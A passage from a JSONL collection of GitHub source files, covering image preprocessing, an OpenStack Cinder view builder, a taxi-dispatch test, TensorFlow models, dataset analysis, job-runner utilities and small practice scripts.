img)\n \n def crop(self, img, crop):\n x, y, w, h = crop\n return img[y:y+h,x:x+w]\n\n def bbox_contour(self, contour):\n \"\"\"Crop the mask\"\"\"\n _x,_y,_w,_h = cv2.boundingRect(contour)\n if _w > 100 and _h > 100:\n x,y,w,h = _x, _y, _w, _h\n diff = w - h\n if diff > 0:\n x -= self.pad\n w += 2 * self.pad\n y = y - diff // 2 - self.pad\n h = w\n elif diff < 0:\n y -= self.pad\n h += 2 * self.pad\n x = x + diff // 2 - self.pad\n w = h\n return x,y,w,h\n \n def saturate(self, img, satval):\n imghsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV).astype(\"float32\")\n h, s, v = cv2.split(imghsv)\n s = s*satval\n s = np.clip(s,0,255)\n imgmer = cv2.merge([h,s,v])\n return cv2.cvtColor(imgmer.astype(\"uint8\"), cv2.COLOR_HSV2RGB)\n\n def contrast(self, img, contrast):\n clip, k = contrast\n lab= cv2.cvtColor(img, cv2.COLOR_RGB2LAB)\n l, a, b = cv2.split(lab)\n clahe = cv2.createCLAHE(clipLimit=clip, tileGridSize=(k,k))\n cl = clahe.apply(l)\n limg = cv2.merge((cl,a,b))\n return cv2.cvtColor(limg, cv2.COLOR_LAB2RGB)","repo_name":"CaptainStiggz/petals","sub_path":"preprocessing/process_v2.py","file_name":"process_v2.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1088366","text":"import multiprocessing\nfrom multiprocessing.managers import SyncManager\nimport mem_struc_t as m_s\n\nm_s.MyManager.register('mem_test', m_s.mem_test)\n\ndef update_mem(mem_test_inst):\n #append to list a first time\n loc = m_s.position(1,2,3)\n #m_s.lock.acquire()\n m_s.append_pos_list(mem_test_inst, 0, loc)\n #m_s.lock.release()\n\n #append to list a second time\n loc = m_s.position(4,5,6)\n #m_s.lock.acquire()\n m_s.append_pos_list(mem_test_inst, 0, loc)\n #m_s.lock.release()\n\n check = m_s.check(mem_test_inst)\n\n print(check.get(0).position_list.get(0).x )\n print(check.get(0).position_list.get(0).y )\n print(check.get(0).position_list.get(0).phi )\n\n print(check.get(0).position_list.get(1).x )\n print(check.get(0).position_list.get(1).y )\n print(check.get(0).position_list.get(1).phi )\n\n\ndef test():\n manager = m_s.Manager()\n mem_test_inst = manager.mem_test()\n\n m_s.create_map_list(mem_test_inst, 2)\n\n l = multiprocessing.Lock()\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\n for _ in range(0,2):\n pool.apply_async(func=update_mem, args=(mem_test_inst,))\n pool.close()\n pool.join()\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"Brandonio-c/SYMBO-SLAM","sub_path":"Control_Agent_2/src/tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"9579901445","text":"from cinder.api import common\nfrom cinder import group as group_api\nfrom cinder.objects import fields\nfrom cinder.volume import group_types\n\n\nclass ViewBuilder(common.ViewBuilder):\n \"\"\"Model a server API response as a python dictionary.\"\"\"\n\n _collection_name = \"volumes\"\n\n def __init__(self):\n \"\"\"Initialize view builder.\"\"\"\n super(ViewBuilder, self).__init__()\n\n def summary_list(self, request, volumes, volume_count=None):\n \"\"\"Show a list of volumes without many details.\"\"\"\n return self._list_view(self.summary, request, volumes,\n volume_count)\n\n def detail_list(self, request, volumes, volume_count=None):\n \"\"\"Detailed view of a list of volumes.\"\"\"\n return self._list_view(self.detail, request, volumes,\n volume_count,\n self._collection_name + '/detail')\n\n def summary(self, request, volume):\n \"\"\"Generic, non-detailed view of a volume.\"\"\"\n return {\n 'volume': {\n 'id': volume['id'],\n 'name': volume['display_name'],\n 'links': self._get_links(request,\n volume['id']),\n },\n }\n\n def _get_volume_status(self, volume):\n # NOTE(wanghao): for fixing bug 1504007, we introduce 'managing',\n # 'error_managing' and 'error_managing_deleting' status into managing\n # process, but still expose 'creating' and 'error' and 'deleting'\n # status to user for API compatibility.\n status_map = {\n 'managing': 'creating',\n 'error_managing': 'error',\n 'error_managing_deleting': 'deleting',\n }\n vol_status = volume.get('status')\n return status_map.get(vol_status, vol_status)\n\n def detail(self, request, volume):\n \"\"\"Detailed view of a single volume.\"\"\"\n volume_ref = {\n 'volume': {\n 'id': volume.get('id'),\n 'status': self._get_volume_status(volume),\n 'size': volume.get('size'),\n 'availability_zone': volume.get('availability_zone'),\n 'created_at': volume.get('created_at'),\n 'updated_at': volume.get('updated_at'),\n 'name': volume.get('display_name'),\n 'description': volume.get('display_description'),\n 'volume_type': self._get_volume_type(request, volume),\n 'snapshot_id': volume.get('snapshot_id'),\n 'source_volid': volume.get('source_volid'),\n 'metadata': self._get_volume_metadata(volume),\n 'links': self._get_links(request, volume['id']),\n 'user_id': volume.get('user_id'),\n 'bootable': str(volume.get('bootable')).lower(),\n 'encrypted': self._is_volume_encrypted(volume),\n 'replication_status': volume.get('replication_status'),\n 'consistencygroup_id': volume.get('consistencygroup_id'),\n 'multiattach': volume.get('multiattach'),\n }\n }\n ctxt = request.environ['cinder.context']\n\n attachments = self._get_attachments(volume, ctxt.is_admin)\n volume_ref['volume']['attachments'] = attachments\n\n if ctxt.is_admin:\n volume_ref['volume']['migration_status'] = (\n volume.get('migration_status'))\n\n # NOTE(xyang): Display group_id as consistencygroup_id in detailed\n # view of the volume if group is converted from cg.\n group_id = volume.get('group_id')\n if group_id is not None:\n # Not found exception will be handled at the wsgi level\n grp = group_api.API().get(ctxt, group_id)\n cgsnap_type = group_types.get_default_cgsnapshot_type()\n if grp.group_type_id == cgsnap_type['id']:\n volume_ref['volume']['consistencygroup_id'] = group_id\n\n return volume_ref\n\n def _is_volume_encrypted(self, volume):\n \"\"\"Determine if volume is encrypted.\"\"\"\n return volume.get('encryption_key_id') is not None\n\n def _get_attachments(self, volume, is_admin):\n \"\"\"Retrieve the attachments of the volume object.\"\"\"\n attachments = []\n\n for attachment in volume.volume_attachment:\n if (attachment.get('attach_status') ==\n fields.VolumeAttachStatus.ATTACHED):\n a = {'id': attachment.get('volume_id'),\n 'attachment_id': attachment.get('id'),\n 'volume_id': attachment.get('volume_id'),\n 'server_id': attachment.get('instance_uuid'),\n 'host_name': attachment.get('attached_host'),\n 'device': attachment.get('mountpoint'),\n 'attached_at': attachment.get('attach_time'),\n }\n if not is_admin:\n a['host_name'] = None\n attachments.append(a)\n\n return attachments\n\n def _get_volume_metadata(self, volume):\n \"\"\"Retrieve the metadata of the volume object.\"\"\"\n return volume.metadata\n\n def _get_volume_type(self, request, volume):\n \"\"\"Retrieve the type of the volume object.\"\"\"\n if volume['volume_type_id'] and volume.get('volume_type'):\n return volume['volume_type']['name']\n else:\n return volume['volume_type_id']\n\n def _list_view(self, func, request, volumes, volume_count,\n coll_name=_collection_name):\n \"\"\"Provide a view for a list of volumes.\n\n :param func: Function used to format the volume data\n :param request: API request\n :param volumes: List of volumes in dictionary format\n :param volume_count: Length of the original list of volumes\n :param coll_name: Name of collection, used to generate the next link\n for a pagination query\n :returns: Volume data in dictionary format\n \"\"\"\n volumes_list = [func(request, volume)['volume'] for volume in volumes]\n volumes_links = self._get_collection_links(request,\n volumes,\n coll_name,\n volume_count)\n volumes_dict = dict(volumes=volumes_list)\n\n if volumes_links:\n volumes_dict['volumes_links'] = volumes_links\n\n return volumes_dict\n","repo_name":"openstack/cinder","sub_path":"cinder/api/v2/views/volumes.py","file_name":"volumes.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"33606938332","text":"import pytest\n\nAIRPORT_POINT = [37.584373, 55.817079]\nCITY_POINT = [37.646516, 55.665302]\n\n\ndef get_airport_zones_config():\n return {\n 'moscow': {\n 'airport_title_key': 'moscow_airport_key',\n 'enabled': True,\n 'main_area': 'moscow_airport',\n 'notification_area': 'moscow_airport_notification',\n 'old_mode_enabled': False,\n 'tariff_home_zone': 'moscow',\n 'update_interval_sec': 5,\n 'use_queue': True,\n 'waiting_area': 'moscow_airport_waiting',\n 'whitelist_classes': {\n 'econom': {'reposition_enabled': False, 'nearest_mins': 60},\n },\n 'mix_city_orders': True,\n },\n }\n\n\ndef get_request_body(uuids, point, destination, order_calc_time=0):\n request_body = {\n 'driver_ids': [{'uuid': uuid, 'dbid': 'dbid0'} for uuid in uuids],\n 'geoindex': 'graph',\n 'max_distance': 9999999,\n 'limit': 3,\n 'filters': ['efficiency/airport_entry_limit'],\n 'point': point,\n 'destination': destination,\n 'zone_id': 'moscow_airport',\n 'order': {'calc': {'time': order_calc_time}},\n }\n\n return request_body\n\n\n@pytest.mark.parametrize(\n 'order_point, order_dest, limit_end, order_time, '\n 'use_ttl_config, is_driver_in_result',\n [\n # Order not in airport\n (CITY_POINT, CITY_POINT, '2020-04-20T20:10:00+00:00', 0, False, True),\n # Source in airport, no limit\n (AIRPORT_POINT, CITY_POINT, None, 0, False, True),\n # Source in airport, has limit\n (\n AIRPORT_POINT,\n CITY_POINT,\n '2020-04-20T20:00:00+00:00',\n 0,\n False,\n False,\n ),\n # Source in airport, limit drops\n (\n AIRPORT_POINT,\n CITY_POINT,\n '2020-04-20T09:55:00+00:00',\n 0,\n False,\n True,\n ),\n # Source in airport, limit doesn't drop cause with config\n (\n AIRPORT_POINT,\n CITY_POINT,\n '2020-04-20T09:55:00+00:00',\n 0,\n True,\n False,\n ),\n # Destination in airport, no limit\n (CITY_POINT, AIRPORT_POINT, None, 0, False, True),\n # Destination in airport, has limit\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T20:00:00+00:00',\n 0,\n False,\n False,\n ),\n # Destination in airport, limit drops 1\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T10:00:00+00:00',\n 0,\n False,\n True,\n ),\n # Destination in airport, limit drops 2\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T10:00:00+00:00',\n 100000,\n False,\n True,\n ),\n # Destination in airport, limit drops 3\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T11:00:00+00:00',\n 2000,\n False,\n True,\n ),\n # Destination in airport, limit doesn't drop with config\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T11:00:00+00:00',\n 2000,\n True,\n False,\n ),\n ],\n)\n@pytest.mark.geoareas(filename='airport_geoareas_graph_search.json')\n@pytest.mark.config(\n DISPATCH_AIRPORT_CACHE_TTL=10,\n DISPATCH_AIRPORT_ZONES=get_airport_zones_config(),\n DISPATCH_AIRPORT_AREA_ENTRY_TRACKING={\n 'moscow': {'candidates_filter_settings': {'': True}},\n },\n DISPATCH_AIRPORT_QUEUES_CACHE_GET_ENTRY_LIMIT_REACHED=True,\n)\n@pytest.mark.now('2020-04-20T10:00:00+00:00')\nasync def test_airport_idx(\n taxi_candidates,\n taxi_config,\n driver_positions,\n mockserver,\n order_point,\n order_dest,\n limit_end,\n order_time,\n use_ttl_config,\n is_driver_in_result,\n):\n if use_ttl_config:\n add_raw = 300\n add_percent = 0.2\n else:\n add_raw = 0\n add_percent = 0\n taxi_config.set_values(\n {\n 'DISPATCH_AIRPORT_AREA_ENTRY_TRACKING': {\n 'moscow': {\n 'candidates_filter_settings': {\n 'filter_enabled': True,\n 'eta_correction_raw': add_raw,\n 'eta_correction_percent': add_percent,\n },\n },\n },\n },\n )\n\n @mockserver.json_handler('/dispatch-airport/v1/active-drivers-queues')\n def _active_drivers_queues(request):\n if limit_end:\n return {\n 'queues': [],\n 'entry_limit_reached': [\n {'dbid_uuid': 'dbid0_uuid0', 'limit_end_ts': limit_end},\n ],\n }\n return {'queues': [], 'entry_limit_reached': []}\n\n await driver_positions(\n [{'dbid_uuid': 'dbid0_uuid0', 'position': AIRPORT_POINT}],\n )\n\n request_body = get_request_body(\n uuids=['uuid0'],\n point=order_point,\n destination=order_dest,\n order_calc_time=order_time,\n )\n await taxi_candidates.invalidate_caches(\n cache_names=['dispatch-airport-queues-cache'],\n )\n response = await taxi_candidates.post('search', json=request_body)\n assert response.status_code == 200\n json = response.json()\n assert 'drivers' in json\n if is_driver_in_result:\n assert len(json['drivers']) == 1\n assert json['drivers'][0]['uuid'] == 'uuid0'\n else:\n assert not json['drivers']\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_candidates/test_filter_airport_entry_limit.py","file_name":"test_filter_airport_entry_limit.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16982657628","text":"import numpy as np\n\n# Read main files\ntrain = open('../dataset/NL2SparQL4NLU.train.conll.txt', 'r')\ntest = open('../dataset/NL2SparQL4NLU.test.conll.txt', 'r')\ntrain_csv = open('train_tags.csv', 'w')\ntest_csv = open('test_tags.csv', 'w')\n\n########################\n# Reading of train file\n########################\n\n# Sentences of corpus\ntrain_sents = []\ntmp = []\n\n# Identify all sentences with tuples of word-tag\nfor line in train:\n\ta = list(line.split())\n\n\tif len(a) > 0:\n\t\ttmp.append(tuple(a))\n\telse:\n\t\ttrain_sents.append(tmp)\n\t\ttmp = []\n\t\t\t\n########################\n# Reading of test file\n########################\n\n# Sentences of corpus\ntest_sents = []\ntmp = []\n\n# Identify all sentences with tuples of word-tag\nfor line in test:\n\ta = list(line.split())\n\n\tif len(a) > 0:\n\t\ttmp.append(tuple(a))\n\telse:\n\t\ttest_sents.append(tmp)\n\t\ttmp = []\n\t\t\n\t\t\n######################################\n# Basic information about the dataset\n######################################\n\nprint(\"SENTENCES ANALYSIS\\n\")\n\n# Number of sentences and their average length in training set\nprint(\"Number of training set sentences: \", len(train_sents))\nprint(\"Average length of training sentences: {}\\n\".format(np.mean([len(s) for s in train_sents])))\n\n# Number of sentences and their average length in test set\nprint(\"Number of test set sentences: \", len(test_sents))\nprint(\"Average length of test sentences: {}\\n\\n\".format(np.mean([len(s) for s in test_sents])))\n\n\n################################\n# Concepts and OOV distribution\n################################\n\nprint(\"CONCEPTS DISTRIBUTIONS\\n\")\n\n# Count train concepts\ntrain_concepts_counts = {}\ntotal = 0\n\nfor p in train_sents:\n\tfor i, t in enumerate(p):\n\t\ttrain_concepts_counts[t[1]] = train_concepts_counts.get(t[1], 0) + 1\n\t\ttotal += 1\n\t\t\nsorted_train_concepts = sorted(train_concepts_counts.items(), key=lambda x: x[1], reverse=True)\nprint(\"Train concepts: {}\".format(sorted_train_concepts))\n\n# Out of concept percentage\nprint(\"Train out of concept percentage (\\\"O\\\" tag): {}%\".format(train_concepts_counts['O']/total*100))\nprint(\"Concepts tags for training percentage: {}%\\n\".format((1-train_concepts_counts['O']/total)*100))\n\n# Save the information about train tags counts in a file\n# Header\nhead = \"tag, counts\\n\"\ntrain_csv.write(head)\n\nfor el in sorted_train_concepts:\n\tstring = el[0] + \", \" + str(el[1]) + \"\\n\"\n\ttrain_csv.write(string)\n\t\n\n# Count test concepts\ntest_concepts_counts = {}\ntotal = 0\n\nfor p in test_sents:\n\tfor i, t in enumerate(p):\n\t\ttest_concepts_counts[t[1]] = test_concepts_counts.get(t[1], 0) + 1\n\t\ttotal += 1\n\t\t\nsorted_test_concepts = sorted(test_concepts_counts.items(), key=lambda x: x[1], reverse=True)\nprint(\"Test concepts: {}\".format(sorted_test_concepts))\n\n# Out of concept percentage\nprint(\"Test out of concept percentage (\\\"O\\\" tag): {}%\".format(test_concepts_counts['O']/total*100))\nprint(\"Concepts tags for test percentage: {}%\\n\".format((1-test_concepts_counts['O']/total)*100))\n\n# Save the information about test tags counts in a file\n# Header\nhead = \"tag, counts\\n\"\ntest_csv.write(head)\n\nfor el in sorted_test_concepts:\n\tstring = el[0] + \", \" + str(el[1]) + \"\\n\"\n\ttest_csv.write(string)\ntest_csv.close()\n","repo_name":"Svidon/LUS_Project1","sub_path":"data_analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30275924705","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 6 20:08:24 2021\n\n@author: USER\n\"\"\"\n\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.preprocessing import MinMaxScaler, OneHotEncoder\nfrom sklearn.model_selection import train_test_split\n\ndef import_data():\n dataset = pd.read_csv(\"gender_classification.csv\")\n x = dataset[[\"long_hair\", \"forehead_width_cm\", \"forehead_height_cm\", \"nose_wide\", \"nose_long\",\"lips_thin\", \"distance_nose_to_lip_long\"]]\n y = dataset[[\"gender\"]]\n \n return x,y\n\ndef preprocess_data(features, target):\n features = MinMaxScaler().fit_transform(features)\n target = OneHotEncoder(sparse=False).fit_transform(target)\n \n return features, target\n\nlayers = {\n 'input': 7,\n 'hidden': 7,\n 'output': 2\n }\n\nweight = {\n 'hidden': tf.Variable(tf.random.normal([layers['input'], layers['hidden']])),\n 'output': tf.Variable(tf.random.normal([layers['hidden'], layers['output']]))\n }\n\nbias = {\n 'hidden': tf.Variable(tf.random.normal([layers['hidden']])),\n 'output': tf.Variable(tf.random.normal([layers['output']]))\n }\n\ndef activate(x):\n return tf.nn.sigmoid(x)\n\ndef foward_pass(features):\n x1 = tf.matmul(features, weight['hidden']) + bias['hidden']\n y1 = activate(x1)\n \n x2 = tf.matmul(y1, weight['output']) + bias['output']\n y2 = activate(x2)\n \n return y2\n\nfeatures_temp = tf.placeholder(tf.float32, [None, layers['hidden']])\ntarget_temp = tf.placeholder(tf.float32, [None, layers['output']])\n\noutput = foward_pass(features_temp)\nerror = tf.reduce_mean(0.5 * (target_temp - output) ** 2)\n\nLearning_rate = 0.1\nepoch = 5000 \ntraining = tf.train.GradientDescentOptimizer(0.1).minimize(error)\n\nfeatures, target = import_data()\nfeatures, target = preprocess_data(features, target)\n\nfeatures_train, features_test, target_train, target_test = train_test_split(features, target, test_size = 0.2)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n \n for i in range(epoch+1):\n train_data = {\n features_temp : features_train,\n target_temp : target_train\n }\n sess.run(training, feed_dict = train_data)\n curr_error = sess.run(error, feed_dict = train_data)\n \n if i % 200 == 0:\n print(f\"epoch: {i}, Current Error = {curr_error}\")\n \n accuracy = tf.equal(tf.argmax(target_temp, axis = 1), tf.argmax(output, axis = 1))\n test_data = {\n features_temp : features_test,\n target_temp: target_test\n }\n result = tf.reduce_mean(tf.cast(accuracy, tf.float32))\n print(f\"Accuracy = {sess.run(result, feed_dict = test_data) * 100}%\")","repo_name":"kevinsamandaria/GenderClassificatoin","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73980119250","text":"\"\"\"\nGiven a sorted array arr of distinct integers, write a function indexEqualsValueSearch that returns the \nlowest index i for which arr[i] == i. \nReturn -1 if there is no such index. \nAnalyze the time and space complexities of your solution and explain its correctness.\n\nExamples:\n\ninput: arr = [-8,0,2,5]\noutput: 2 # since arr[2] == 2\n\ninput: arr = [-1,0,3,6]\noutput: -1 # since no index in arr satisfies arr[i]\n\"\"\"\n#trick is to find the lowest index. bruteforce - loop all elements and check for first match (since it's already sorted)\n#Improved - binary search\n\ndef arrIdx(nums):\n s , h = 0, len(nums) - 1\n midIdx = float('inf')\n while(s <= h):\n mid = (s+h)//2\n if(nums[mid] == mid):\n midIdx = min(midIdx, mid)\n h = mid - 1 #hence we move towards left once we found a match to see if there are matches before\n elif(nums[mid] > mid):\n h = mid - 1\n else:\n s = mid + 1\n return -1 if midIdx == float('inf') else mid\nnums = [0,1,2,3,4,5,6,7,8] # in this example it matches 4 first, but we also have 0\nprint(arrIdx(nums))\n","repo_name":"Gowthami03B/practiceProblems","sub_path":"arrIdxPramp.py","file_name":"arrIdxPramp.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35706601764","text":"import os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport tensorflow as tf\r\nold_v = tf.logging.get_verbosity()\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nmodel_dir = os.path.join(os.getcwd(), \"model\")\r\nif not os.path.exists(model_dir):\r\n\tos.makedirs(model_dir)\r\n\tpass\r\n\r\n# dataset\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nmnist = input_data.read_data_sets('/tmp/data', one_hot=True)\r\n\r\nn_pixels = 28*28\r\n\r\nX = tf.placeholder(tf.float32, shape=([None, n_pixels]))\r\n\r\n\r\ndef weight_variables(shape, name):\r\n\tinitial = tf.truncated_normal(shape, stddev=0.1)\r\n\treturn tf.Variable(initial, name = name)\r\n\r\ndef bias_variable(shape, name):\r\n\tinitial = tf.truncated_normal(shape, stddev=0.1)\r\n\treturn tf.Variable(initial, name=name)\r\n\r\ndef FC_layer(x, w, b):\r\n\treturn tf.matmul(x, w) + b\r\n\r\nlatent_dim = 20\r\nh_dim = 500\r\n# Encoder -----------------------------------------------------------------------------------------\r\n# layer 1\r\nW_enc = weight_variables([n_pixels, h_dim], 'W_enc')\r\nb_enc = bias_variable([h_dim], 'b_enc')\r\n# tanh activation\r\nh_enc = tf.nn.tanh(FC_layer(X, W_enc, b_enc))\r\n\r\n# layer 2\r\nW_mu = weight_variables([h_dim, latent_dim], 'W_mu')\r\nb_mu = bias_variable([latent_dim], 'b_mu')\r\nmu = FC_layer(h_enc, W_mu, b_mu) # mean\r\n\r\n# standard deviation\r\nW_logstd = weight_variables([h_dim, latent_dim], 'W_logstd')\r\nb_logstd = bias_variable([latent_dim], 'b_logstd')\r\nlogstd = FC_layer(h_enc, W_logstd, b_logstd) # std\r\n\r\n# RANDOMNESSSSSSSSSSSSSssss\r\nnoise = tf.random_normal([1, latent_dim])\r\n\r\n# z is the ultimate output of our encoder\r\nz = mu + tf.multiply(noise, tf.exp(.5 * logstd))\r\n# Encoder -----------------------------------------------------------------------------------------\r\n#Z = tf.placeholder(tf.float32, shape=([None, latent_dim]))\r\n# Decoder -----------------------------------------------------------------------------------------\r\n\r\n# layer 1\r\nW_dec = weight_variables([latent_dim, h_dim], 'W_dec')\r\nb_dec = bias_variable([h_dim], 'b_dec')\r\nh_dec = tf.nn.tanh(FC_layer(z, W_dec, b_dec))\r\n\r\n\r\n# layer 2\r\nW_reconstruct = weight_variables([h_dim, n_pixels], 'W_reconstruct')\r\nb_reconstruct = bias_variable([n_pixels], 'b_reconstruct')\r\n\r\nreconstruction = tf.nn.sigmoid(FC_layer(h_dec, W_reconstruct, b_reconstruct))\r\n\r\n# Decoder -----------------------------------------------------------------------------------------\r\n\r\n# Loss Function\r\nlog_likelihood = tf.reduce_sum(X * tf.log(reconstruction + 1e-9) + (1 - X) * tf.log(1 - reconstruction + 1e-9), reduction_indices= 1)\r\n\r\n# KL Divergence\r\nKL_tern = -.5 * tf.reduce_sum(1 + 2 * logstd - tf.pow(mu, 2) - tf.exp(2 * logstd), reduction_indices= 1)\r\n\r\nvariational_lower_bound = tf.reduce_mean(log_likelihood - KL_tern)\r\noptimizer = tf.train.AdadeltaOptimizer().minimize( - variational_lower_bound)\r\n\r\nsaver = tf.train.Saver()\r\ninit = tf.global_variables_initializer()\r\nsess = tf.InteractiveSession()\r\nsess.run(init)\r\nsaver.restore(sess, os.path.join(model_dir, \"autoencoder_model.ckpt\"))\r\n\r\nload_model = False\r\nif load_model:\r\n\tsaver.restore(sess, os.path.join(model_dir, \"autoencoder_model.ckpt\"))\r\n\r\nnum_pair = 10\r\nimage_indices = np.random.randint(0, 200, num_pair)\r\nfor pair in range(num_pair):\r\n\tx = np.reshape(mnist.test.images[image_indices[pair]], (1, n_pixels))\r\n\tplt.figure()\r\n\tx_image = np.reshape(x, (28, 28))\r\n\tplt.subplot(121)\r\n\tplt.imshow(x_image)\r\n\r\n\tx_reconstruction = reconstruction.eval(feed_dict= {X:x})\r\n\r\n\tx_reconstruction_image = (np.reshape(x_reconstruction, (28, 28)))\r\n\r\n\tplt.subplot(122)\r\n\tplt.imshow(x_reconstruction_image)\r\nplt.show()","repo_name":"li195111/Autoencoder-test","sub_path":"Load_Autoencoder.py","file_name":"Load_Autoencoder.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9849463656","text":"\"\"\"Definition of all runner classes.\"\"\"\n\nimport multiprocessing\nimport os\nfrom abc import ABC, abstractmethod\nfrom .utilities import start_process, get_gpu_count\n\n\nclass AbstractRunner(ABC):\n \"\"\"Abstract runner class.\n\n Parameters\n ----------\n num_threads: int, optional\n Number of threads to use.\n use_gpu: bool, optional\n Flag to indicate GPU usage.\n wall_time: int, optional\n Required time, in minutes, to run the process.\n memory: int, optional\n Required memory, in MB, to run run the process.\n\n \"\"\"\n\n def __init__(self, num_threads=1, use_gpu=False, wall_time=None, memory=None):\n self.num_workers = multiprocessing.cpu_count() // num_threads\n self.num_threads = num_threads\n self.num_gpu = get_gpu_count()\n self.gpu_idx = 0\n self.use_gpu = use_gpu\n self.wall_time = wall_time\n self.memory = memory\n\n @abstractmethod\n def run(self, cmd_list):\n \"\"\"Run commands in list.\n\n Parameters\n ----------\n cmd_list: list\n\n \"\"\"\n raise NotImplementedError\n\n def _add_device(self, cmd):\n \"\"\"Add device keyword to a command.\"\"\"\n if self.num_gpu == 0 or (not self.use_gpu):\n cmd += ' --device cpu'\n else:\n cmd += ' --device cuda:{}'.format(self.gpu_idx)\n self.gpu_idx = (self.gpu_idx + 1) % self.num_gpu\n\n return cmd\n\n\nclass LeonhardRunner(AbstractRunner):\n \"\"\"Runner in Leonhard Cluster.\"\"\"\n\n def run(self, cmd_list):\n \"\"\"See `AbstractRunner.run'.\"\"\"\n tasks = cmd_list[:]\n try:\n os.makedirs('logs/')\n except FileExistsError:\n pass\n\n for cmd in tasks:\n bsub_cmd = 'bsub '\n\n config_file = cmd.split('config-file ')[1].split('/config.yaml')[0]\n config_file = config_file.replace('/', '_')\n bsub_cmd += '-oo {} '.format('logs/lsf.{}'.format(config_file))\n\n if self.wall_time is not None:\n bsub_cmd += '-W {} '.format(self.wall_time)\n if self.memory is not None:\n bsub_cmd += '-R \"rusage[mem={}]\" '.format(self.memory)\n if self.use_gpu:\n bsub_cmd += '-R \"rusage[ngpus_excl_p=1]\" '\n\n bsub_cmd += '-n {} '.format(self.num_threads)\n os.system(bsub_cmd + '\"{}\" &'.format(cmd))\n\n\nclass SingleRunner(AbstractRunner):\n \"\"\"Runner in a Single Machine.\"\"\"\n\n def run(self, cmd_list):\n \"\"\"See `AbstractRunner.run'.\"\"\"\n workers_idle = [False] * self.num_workers\n pool = [start_process(lambda: None) for _ in range(self.num_workers)]\n tasks = cmd_list[:]\n\n while not all(workers_idle):\n for i in range(self.num_workers):\n if not pool[i].is_alive():\n pool[i].terminate()\n if len(tasks) > 0:\n cmd = self._add_device(tasks.pop(0))\n pool[i] = start_process(lambda x: os.system(x), (cmd,))\n else:\n workers_idle[i] = True\n","repo_name":"sebascuri/GPSSMtorch","sub_path":"gpssm/runner/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"18791464740","text":"#!python3.6\nimport sys\nimport re\n\ndef line2command(line):\n m = re.search('\\{.*\\}\\{', line)\n cmd = m.group()[2:-2]\n m = re.search('\\}\\{.*\\}\\n', line)\n text = m.group()[2:-2]\n return [cmd, text]\n\ndef plain2latex(line, cmds):\n tmp = line\n for cmd in cmds:\n tmp = re.sub(\" \"+cmd[1]+\" \", \"~\\\\\"+cmd[0]+\"~\", tmp)\n tmp = re.sub(\" \"+cmd[1]+\",\", \"~\\\\\"+cmd[0]+\",\", tmp)\n tmp = re.sub(\" \"+cmd[1]+\"\\.\", \"~\\\\\"+cmd[0]+\".\", tmp)\n return tmp\n\nif __name__ == '__main__':\n args = sys.argv\n path = args[1]\n with open(path) as f:\n l = f.readlines()\n \n commands = [i for i in l if \"\\\\newcommand\" in i and \"[1]\" not in i]\n cmds = [line2command(i) for i in commands]\n\n output = \"\" \n for line in l:\n output += plain2latex(line, cmds)\n\n with open(path[:-4]+\".fixed.tex\", mode='w') as f:\n f.write(output)\n\n\n","repo_name":"chike0905/tex2plaintxt","sub_path":"plain2latex.py","file_name":"plain2latex.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24067299943","text":"import argparse\nimport logging\nfrom itertools import product\nimport functools\n\nimport pyMetaLearn.optimizers.optimizer_base as optimizer_base\n\n\nlogging.basicConfig(format='[%(levelname)s] [%(asctime)s:%(name)s] %('\n 'message)s', datefmt='%H:%M:%S')\nlogger = logging.getLogger(\"Gridsearch\")\nlogger.setLevel(logging.INFO)\n\n\ndef parse_parameters(args=None):\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-a\", \"--algorithm\")\n group.add_argument(\"--cli_target\")\n parser.add_argument(\"-p\", \"--params\", required=True)\n args = parser.parse_args(args=args)\n return args\n\n\ndef perform_gridsearch(fn, grid):\n retvals = []\n for idx, parameters in enumerate(grid):\n logger.info(\"%d/%d, parameters: %s\\n\" % (idx+1, len(grid),\n str(parameters)))\n retvals.append(fn(parameters))\n logger.info(\"Response: \" + str(retvals[-1]))\n return 